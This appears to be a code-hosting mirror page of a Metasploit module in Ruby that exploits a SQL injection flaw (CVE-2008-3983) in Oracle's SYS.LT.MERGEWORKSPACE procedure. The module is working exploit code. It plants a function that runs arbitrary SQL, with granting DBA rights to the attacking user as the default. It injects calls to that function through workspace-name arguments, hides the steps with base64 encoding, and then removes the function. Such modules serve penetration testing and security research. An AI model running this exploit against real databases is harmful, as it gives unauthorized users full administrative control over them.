CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb
Views: 11784
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::ORACLE
8
9
def initialize(info = {})
10
super(update_info(info,
11
'Name' => 'Oracle DB SQL Injection via SYS.LT.MERGEWORKSPACE',
12
'Description' => %q{
13
This module exploits a sql injection flaw in the MERGEWORKSPACE
14
procedure of the PL/SQL package SYS.LT. Any user with execute
15
privilege on the vulnerable package can exploit this vulnerability.
16
},
17
'Author' => [ 'CG' ],
18
'License' => MSF_LICENSE,
19
'References' =>
20
[
21
[ 'CVE', '2008-3983'],
22
[ 'OSVDB', '49325'],
23
[ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ],
24
[ 'URL', 'http://www.dsecrg.com/pages/expl/show.php?id=23' ]
25
26
],
27
'DisclosureDate' => '2008-10-22'))
28
29
register_options(
30
[
31
OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]),
32
])
33
end
34
35
def run
36
return if not check_dependencies
37
38
name = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
39
rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
40
rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
41
rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
42
cruft = Rex::Text.rand_text_alpha_upper(1)
43
44
function = "
45
CREATE OR REPLACE FUNCTION #{cruft}
46
RETURN VARCHAR2 AUTHID CURRENT_USER
47
AS
48
PRAGMA AUTONOMOUS_TRANSACTION;
49
BEGIN
50
EXECUTE IMMEDIATE '#{datastore['SQL']}';
51
COMMIT;
52
RETURN '#{cruft}';
53
END;"
54
55
package1 = %Q|
56
BEGIN
57
SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}');
58
END;
59
|
60
61
package2 = %Q|
62
BEGIN
63
SYS.LT.MERGEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}');
64
END;
65
|
66
67
uno = Rex::Text.encode_base64(function)
68
dos = Rex::Text.encode_base64(package1)
69
tres = Rex::Text.encode_base64(package2)
70
71
sql = %Q|
72
DECLARE
73
#{rand1} VARCHAR2(32767);
74
#{rand2} VARCHAR2(32767);
75
#{rand3} VARCHAR2(32767);
76
BEGIN
77
#{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{uno}')));
78
EXECUTE IMMEDIATE #{rand1};
79
#{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{dos}')));
80
EXECUTE IMMEDIATE #{rand2};
81
#{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{tres}')));
82
EXECUTE IMMEDIATE #{rand3};
83
END;
84
|
85
86
clean = "DROP FUNCTION #{cruft}"
87
88
# Try first, if it's good.. keep doing the dance.
89
print_status("Attempting sql injection on SYS.LT.MERGEWORKSPACE...")
90
begin
91
prepare_exec(sql)
92
rescue => e
93
return
94
end
95
96
print_status("Removing function '#{cruft}'...")
97
prepare_exec(clean)
98
99
end
100
end
101
102